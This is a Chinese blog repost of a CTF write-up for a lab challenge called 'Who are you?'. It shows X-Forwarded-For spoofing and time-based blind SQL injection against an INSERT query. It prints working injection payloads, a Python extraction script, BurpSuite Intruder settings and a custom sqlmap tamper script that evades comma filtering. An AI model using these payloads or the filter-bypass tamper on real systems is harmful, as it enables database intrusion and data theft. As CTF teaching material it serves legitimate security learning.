实验吧CTF-Who are you?

最新推荐文章于 2024-05-19 09:40:06 发布
最新推荐文章于 2024-05-19 09:40:06 发布
阅读量5.4k 收藏 2
点赞数 1
分类专栏: ctf

原文地址   http://www.jianshu.com/p/5d34b3722128

Who are you

http://www.shiyanbar.com/ctf/1941

题目:

我要把攻击我的人都记录db中去!

格式ctf{}

解题:

访问链接,页面显示your IP is XX.XX.XX.XX,知道这是一个关于IP伪造。

尝试各种伪造IP的HTTP头:

X-Forwarded-For
Client-IP
x-remote-IP
x-originating-IP
x-remote-addr

发现X-Forwarded-For可以伪造。


sp160830_162630.png

题目说:

我要把攻击我的人都记录db中去!

可以猜测这是一个INSERT INTO的注入。

尝试各种注入,发现注入的语句给原封不动地显示在页面中,但,如果注入的语句有逗号,则后面的内容就不会显示在页面中。


sp160830_162812.png

所以,猜测逗号后面的内容给截掉了。

入了一个坑,导致想不到怎么注入:

一直觉得后台程序的逻辑是这样的:取X-Forwarded-For的内容,去掉逗号后的内容,再拼接INSERT INTO的SQL语句,写到数据库中,再用SELECT语句从数据库取出(那程序怎么确定现在取回的值就是刚刚插入的值呢?显然这不能保证。),显示在页面中。

入了这个坑,就觉得注入的语句没有逃脱单引号的包围,注入的X-Forwarded-For内容被原封不动地写进了数据库中。

看了Writeup之后才知道这是time-based盲注。

所以想后台程序的逻辑差不多是这样:取X-Forwarded-For的值,去掉逗号后的内容,剩下的存在一个变量里,假设变量名是tmp,然后再拼接到INSERT INTO语句中,执行SQL语句。最后再把tmp的内容显示在页面中。

后台代码可能是这样:

<?php
error_reporting(0);

function getIp(){
    $ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
      $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
     $ip = $_SERVER['REMOTE_ADDR'];
}
   $ip_arr = explode(',', $ip);
   return $ip_arr[0];
}

$host="localhost";
$user="root";
$pass="root";
$db="sangebaimao";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

?>

所以这不能利用真值注入,报错注入等,只能尝试基于时间的注入。

入了坑,要懂得跳出来。 当设想的程序逻辑跟试验结果不符合,就要尝试另外的设想、思路。

做这道题,用三种方法:

  1. 用Python脚本跑。

  2. 利用BurpSuite进行基于时间的盲注。

  3. 自己写tamper来使用sqlmap绕过 服务端对逗号的过滤 进行time-based注入(修改queries.xml这个方法不行)

0x01 用Python脚本跑

事先确定了flag存储在flag表的flag字符里,且flag的长度为32,

一个简陋的脚本:

#-*-coding:utf-8-*-
import requests
import string
url="http://xxx"
guess=string.lowercase + string.uppercase + string.digits
flag=""

for i in range(1,33):
   for str in guess:
     headers={"x-forwarded-for":"xx'+"+"(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(5) else 1 end ) and '1'='1" %(i,str)}
     try: 
         res=requests.get(url,headers=headers,timeout=4)
     except requests.exceptions.ReadTimeout, e:
         flag = flag + str
         print "flag:", flag
         break

print 'result:' + flag

0x02 利用BurpSuite进行基于时间的盲注

参考:https://depthsecurity.com/blog/blind-sql-injection-burpsuite-like-a-boss

下面是几个要点:

1.设置代理

每次开BurpSuite这个工具都要设置代理,这是很麻烦的。通常使用浏览器的设置选项设置代理会比较方便点。

如在Chrome浏览器设置代理:


sp160830_162927.png

更方便的方法是,使用插件。如在Chrome浏览器中使用SwitchyOmega插件来切换代理。这里就不说SwitchyOmega的使用了。

2.BurpSuite如何判断是否超时

首先有个问题,我们如何在BurpSuite得知后台因为SQL的执行而有延迟产生。这需要一点设置。

Options->Connections->Tiimeouts->Normal这一空 改成你想要的超时时间(默认为120秒)。


sp160830_163055.png

在进行Intruder攻击时,如果连接超时,则状态码和length一栏为空。由此可以判断连接是否超时。

需要注意的是:在开始Intruder攻击前,需要把Intruder->Options->Request Engine->Number of threads的线程数改成1,否则将导致前一个请求的延时造成后一个请求延时,这就使判断不正确了。

3.使用BurpSuite进行HTTP头注入需要注意什么
  1. 在Proxy->Intercept->Raw修改数据包内容时:当这个请求没有POST参数,要求最后空两行,否则数据包将发送不成功;当这个请求有POST参数,要求headers与POST参数之间空一行。

sp160830_163341.png

建议在Proxy->Intercept->headers一栏里修改请求包的Headers。

  1. 在开始Intruder攻击前,Intruder->Payloads->Payload Encoding的URL-encode these characters的勾要去掉,即不让BurpSuite对payload进行URL编码。
4.BurpSuite Intruder的Attack Type

本次time-based注入需要选择Cluster bome这个Attack Type

有关BurpSuite的Attack Type参考:http://blog.csdn.net/u012804180/article/details/52015224

下面是具体的攻击步骤:

先设定Burpsuite的Timeout为4秒:


sp160830_163055.png

抓取数据包,并发送到Repeater。

事先验证flag记录的长度,用以下语句来注入:

1' and (select case when (select length(flag) from flag limit 1)=32 then sleep(5) else 1 end) and '1'='1

sp160830_164924.png

当点击Repeter的Go按钮,等待了约五秒,Go按钮从不可按状态转为可按状态,cancel按钮从可按状态转为不可按状态,Reponse没有任何返回,且Burpsuite 的Alerts模块里新增一个Timeout的提示。就表明后台延时了5秒。

这就可以确定其长度为32了。

把数据包发送到Intruder。

构造注入语句:

1' and (select case when (select ord(substring(flag from 1 for 1)) from flag limit 1) = 2 then sleep(5) else 1 end) and '1'='1

其中,表名flag和字段名flag存在可以由以下注入语句来确认:

1' and exists(select flag from flag) and sleep(5) and '1' = '1

在两处位置add $,并设置Attack Type为Cluster bomb:


sp160830_164225.png

设置Payload1:


sp160830_165854.png

设置Payload2:


sp160830_170045.png

把Payload1和Payload2的URL-encode取消掉:


sp160830_170318.png

设置线程数为1:


sp160830_170129.png

万事具备,开始攻击。Inturder->Start Attack


sp160830_170706.png

像这些,Status一栏跟Length一栏为空的请求就是超时的。

利用这些就可以得到flag的ASCII值,再转码就得到flag!

0x03 使用sqlmap绕过 服务端对逗号的过滤

1.使用sqlmap进行HTTP头注入

首先,得知道怎么用sqlmap进行HTTP头注入。

方法:

利用-r 参数指定存储着数据包的文件,并用*号来告诉sqlmap哪里是注入点。

这道题的数据包内容是:

GET /web/wonderkun/index.php HTTP/1.1
Host: ctf5.shiyanbar.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
X-Forwarded-For: 1*
Referer: http://www.shiyanbar.com/ctf/1941
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8

另外,User-Agent、Cookie、Referer的值中可能有*号,这会让sqlmap去测试这些我们不需要测试的地方,这时,可以使用--skip SKIP参数来指示哪里不需要被测试,如:

--skip="user-agent,referer"
2.尝试修改queries文件(不可行)

文件是在sqlmap/xml目录下的queries.xml

可以说这个文件存储着sqlmap构造SQL语句的模板,其部分内容如下:

<root>
    <!-- MySQL -->
    <dbms value="MySQL">
        <cast query="CAST(%s AS CHAR)"/>
        <length query="CHAR_LENGTH(%s)"/>
        <isnull query="IFNULL(%s,' ')"/>
        <delimiter query=","/>
        <limit query="LIMIT %d,%d"/>
        <limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
        <limitgroupstart query="1"/>
        <limitgroupstop query="2"/>
        <limitstring query=" LIMIT "/>
        <order query="ORDER BY %s ASC"/>
        <count query="COUNT(%s)"/>
        <comment query="-- " query2="/*" query3="#"/>
        <substring query="MID((%s),%d,%d)"/>
        <concatenate query="CONCAT(%s,%s)"/>
        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
        <hex query="HEX(%s)"/>
        <inference query="ORD(MID((%s),%d,1))>%d"/>
        <banner query="VERSION()"/>
        <current_user query="CURRENT_USER()"/>
        <current_db query="DATABASE()"/>
        <hostname query="@@HOSTNAME"/>
 ...

我们可以修改<isnull query="IFNULL(%s,' ')"/>一项为<isnull query="(SELECT %s)"> ,这就避免了使用逗号,还有<inference query="ORD(MID((%s),%d,1))>%d"/>可以改为<inference query="ORD(MID((%s) from %d for 1))>%d"/>,诸如此,等等。

不过,为什么这个方法绕不过服务器对逗号的过滤呢?因为sqlmap要使用IF函数,这个函数中有逗号,而且,queries文件里不可以针对IF函数来修改。

参考乌云文章:SQLMAP进阶使用 http://drops.wooyun.org/tips/5254

3.自己写tamper

参考下sqlmap/tamper/目录下的文件,就可以自己写出简单的tamper。

写tamper的思路也很简单:把sqlmap会用到逗号的语句用其他不含有逗号的语句替代。

自己写了一个很简陋的tamper,名为commalessmysql.py,放在sqlmap/tamper目录下。(这个脚本只适用MySQL):

#!/usr/bin/env python

"""
Writed by Ovie 2016-12-05

"""
import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces some instances with something whthout comma 

    Requirement:
        * MySQL

    Tested against:
        * MySQL 5.0


    >>> tamper('ISNULL(TIMESTAMPADD(MINUTE,7061,NULL))')
    'ISNULL(NULL)'

    >>> tamper('MID(VERSION(), 2, 1)')
    'MID(VERSION() FROM 2 FOR 1)'

    >>> tamper('IF(26=26,0,5)')
    'CASE WHEN 26=26 THEN 0 ELSE 5 END'

    >>> tamper('IFNULL(NULL,0x20)')
    'CASE WHEN NULL=NULL THEN 0x20 ELSE NULL END'

    >>> tamper('LIMIT 2, 3')
    'LIMIT 3 OFFSET 2'
    """


    def commalessif(payload):
        if payload and payload.find("IF") > -1:
            while payload.find("IF(") > -1:
                index = payload.find("IF(")
                depth = 1
                comma1, comma2, end = None, None, None

                for i in xrange(index + len("IF("), len(payload)):
                    if depth == 1 and payload[i] == ',' and not comma1:
                        comma1 = i

                    elif depth == 1 and payload[i] == ',' and comma1:
                        comma2 = i

                    elif depth == 1 and payload[i] == ')':
                        end = i
                        break

                    elif payload[i] == '(':
                        depth += 1

                    elif payload[i] == ')':
                        depth -= 1

                if comma1 and comma2 and end:
                    _ = payload[index + len("IF("):comma1]
                    __ = payload[comma1 + 1:comma2]
                    ___ = payload[comma2 + 1:end]
                    newVal = "CASE WHEN %s THEN %s ELSE %s END" % (_, __, ___)
                    payload = payload[:index] + newVal + payload[end + 1:]
                else:
                    break

        return payload

    def commalessifnull(payload):
        if payload and payload.find("IFNULL") > -1:
            while payload.find("IFNULL(") > -1:
                index = payload.find("IFNULL(")
                depth = 1
                comma, end = None, None

                for i in xrange(index + len("IFNULL("), len(payload)):
                    if depth == 1 and payload[i] == ',':
                        comma = i

                    elif depth == 1 and payload[i] == ')':
                        end = i
                        break

                    elif payload[i] == '(':
                        depth += 1

                    elif payload[i] == ')':
                        depth -= 1

                if comma and end:
                    _ = payload[index + len("IFNULL("):comma]
                    __ = payload[comma + 1:end].lstrip()
                    newVal = "CASE WHEN %s=NULL THEN %s ELSE %s END" % (_, __, _)
                    payload = payload[:index] + newVal + payload[end + 1:]
                else:
                    break

        return payload

    retVal = payload

    if payload:
        retVal = re.sub(r'(?i)TIMESTAMPADD\(\w+,\d+,NULL\)', 'NULL', retVal)
        retVal = re.sub(r'(?i)MID\((.+?)\s*,\s*(\d+)\s*\,\s*(\d+)\s*\)', 'MID(\g<1> FROM \g<2> FOR \g<3>)', retVal)
        retVal = commalessif(retVal)
        retVal = commalessifnull(retVal)
        retVal = re.sub(r'(?i)LIMIT\s*(\d+),\s*(\d+)', 'LIMIT \g<2> OFFSET \g<1>', retVal)

    return retVal

运行sqlmap:

sqlmap.py -r post.txt --level=3 --skip="user-agent,referer" -v 3 --tamper=commalessmysql -D web4 -T flag -C flag --dump

得到flag。


ncafei
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF---Web---SQL注入---12---referer修改+手动添加参数
qq_22160557的博客
08-01 812
文章目录前言一、题目描述二、解题步骤1、修改请求包2、手动添加参数3、sqlmap三、总结 前言 题目分类: CTF—Web—SQL注入—12—referer修改+手动添加参数 一、题目描述 题目:SQL注入 二、解题步骤 1、修改请求包 Step1:访问http://172.16.15.203/stage/5/6C9428036D386316.php, 弹框“本页面仅接受来自 www.10086.cn的访问”,提示修改“referer”参数 Step2:抓包另存为txt,并修改referer为www
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
【CTF整理】Who are you (2017强网杯web题)
SunnyCat
04-20 1579
【CTF整理】Who are you (2017强网杯web题) 别人思路总结: 0x01 初探 打开网页就是一句“Sorry. You have no permissions.” 按照惯例看看网页源码,发现没有提示; 0x02 初步思考 既然没有提示,也没有其他的链接,那么可能有以下几种可能: 1、敏感文件泄漏 2、跳转 3、cookie / session 第一个想法在经过扫描器扫描之后就放弃...
CTF IP伪造http请求头
最新发布
qq_50351194的博客
05-19 225
X-Forwarded-For: 127.0.0.1 X-Forwarded: 127.0.0.1 Forwarded-For: 127.0.0.1 Forwarded: 127.0.0.1 X-Requested-With: 127.0.0.1 X-Forwarded-Proto: 127.0.0.1 X-Forwarded-Host: 127.0.0.1 X-remote-IP: 127.0.0.1 X-remote-addr: 127.0.0.1 True-Client-IP: 127.0.0.1 X
CTF writeup -who are you?
一个潜心学习的小白
07-29 2903
题目为:who are you? 描述为:我是谁,我在哪,我要做什么? 首页内容为:Sorry. You have no permissions.此时推断本题与cookie有关(50%的可能性)。查看cookie,发现cookie中有一个名为role的数据(此时可以推断此题有90%的可能性与此有关)。 此时看role的值一定是明文加密后生成的。这时就Google或百度在线解码,首...
问题 : What are you doing?
liu344439833的博客
05-07 957
“Hey my friends!What are you doing?”     小伙伴们都在期待了N多年的大学中度过一段时间了,不知道大家都在忙什么呢?有咩有找到自己奋斗的目标?     据说有个叫LOL的帮派横空出世了,影响了无数大学的宅同胞。这里面有两个好斗的角色,一个叫PanSen(简称PS),一个叫JanSheng(简称JS)。这两个家伙以好斗闻名、外人称为“双雄”。不过他俩谁都不服对...
实验吧-who are you?
一个安全研究员
06-28 2810
拿到这一题,根据提示域页面显示的ip,很多小伙伴们肯定猜到了这是一道http头注入,且是与ip相关的,与ip相关的头常见的有: Client-IP x-remote-IP x-originating-IP x-remote-addr x-forwarded-for 最常见的可能就是X-Forwarded-For了吧,所以我直接试了一下,将它的值修改为127.0.0.1,页面上的显示也跟...
ctf-all-in-one
01-30
ctf-all-in-one
实验吧-ctf-misc-附件资源
03-02
实验吧-ctf-misc-附件资源
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
记录实验吧 CTF库 who are you? 过程
weixin_33873846的博客
11-29 395
首先我承认我看了别人怎么做的 因为我并没有什么经验虽然知道回显是由X-Forwarded-For参数导致的 但一直无法利用 所以看了demo因为涉及到要写脚本记录注入过程 所以特此记录我看了2个demo选择了最直接的一个也就是使用awvs扫描 然后再python扫 因为我觉得我并没有手工找注入点的本事 先学学利用工具虽然别人写了用awvs 但是开始不管怎么扫描都是扫描不出来...
who are you?-实验
Xi4or0uji
05-26 1602
who are you?这道题点开看见your ip is :xxx.xxx.xx.xxx然后试了巨久改ip,改了一堆了还是撤都没有然后看了大佬的wp的说是时间盲注,试了一下,确实有延迟,然后就用脚本进行时间盲注了爆数据库#-*-coding:utf-8-*- #暴力数据库 import requests import string url = "http://ctf5.shiyanbar.com...
what fuck are you doing now?
yhm2046的专栏
10-02 3921
 What fuck are you doing now?Its the 4th day of the Independen Days holidays.look what I had done?Hi,what about delphi7?Ok,is you.
实验吧 who are you
windseraph2的博客
04-30 1574
http://www.shiyanbar.com/ctf/1941 题目: 我要把攻击我的人都记录db中去! 格式ctf{} 打开网页发现显示的是本机IP 猜测的是IP伪装 1.尝试各种IP伪装 X-Forwarded-For Client-IP x-remote-IP x-originating-IP x-remote-addr 2.用AWVS扫
实验吧 你真的会php吗,实验吧——你真的会PHP吗?(intval范围 php中\00的利用)...
weixin_33483567的博客
03-21 140
题目地址:http://ctf5.shiyanbar.com/web/PHP/index.php抓包在header中发现提示 访问得到源码1
实验吧_登陆一下好吗(骚注入)&你真的会PHP吗?(代码审计)
a173262565的博客
03-31 212
登陆一下好吗 首先看到两个输入框,分别对应账号密码,随手输个admin,admin进去,提交后发现有回显,既然题目说了过滤了一切,那就先看看过滤了些啥 经过一波测试,发现服务器过滤了union,select,or,for,#,/,* 这就很让人头疼了,没了or就没了万能密码,select也被过滤,我还真想不起来有什么注入语句了 只能去翻看wp学习一下了 一看真的是觉得脑洞...
CTF学习记录004-web请求方式替换拿flag
wupeng_ccab的博客
09-14 538
题目:这是在CTFHUB上的一道简单的WEB请求方式的题目。由页面展示的内容可知,需要用CTFHUB去替换GET。用Burp抓包,直接改GET我喜欢用 Repeater(重发器)修改,重发报文,直接看右侧的回应报文。HTTP协议请求有三部分构成,分别是:请求行,消息报文,请求正文请求行以一个方法符号开头,以空格分开,后面跟着请求的URI和协议的版本,格式如下:其中的Method,定义有8个方法。HTTP1.0定义了三种请求方法: GET, POST 和 HEAD方法。
Burpsuite模块—-Intruder模块详解
Dasdwer的博客
05-17 1564
Burp Intruder是一个强大的工具,用于自动对Web应用程序自定义的攻击,Burp Intruder 是高度可配置的,并被用来在广范围内进行自动化攻击。你可以使用 Burp Intruder 方便地执行许多任务,包括枚举标识符,获取有用数据,漏洞模糊测试。合适的攻击类型取决于应用程序的情况,可能包括:缺陷测试:SQL 注入,跨站点脚本,缓冲区溢出,路径遍历;暴力攻击认证系统;枚举;操纵参数;拖出隐藏的内容和功能;会话令牌测序和会话劫持;数据挖掘;并发攻击;应用层的拒绝服务式攻击。
网络安全自学笔记:实验吧CTF实战-WEB渗透与隐写术解析
实验吧CTF实战之WEB渗透和隐写术解密1"这个主题涵盖了两个关键知识点:WEB渗透和隐写术。WEB渗透是指通过发现和利用网站应用程序的安全漏洞来获取未经授权的访问或控制权限。而隐写术则是指在图像或其他媒体中隐藏...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值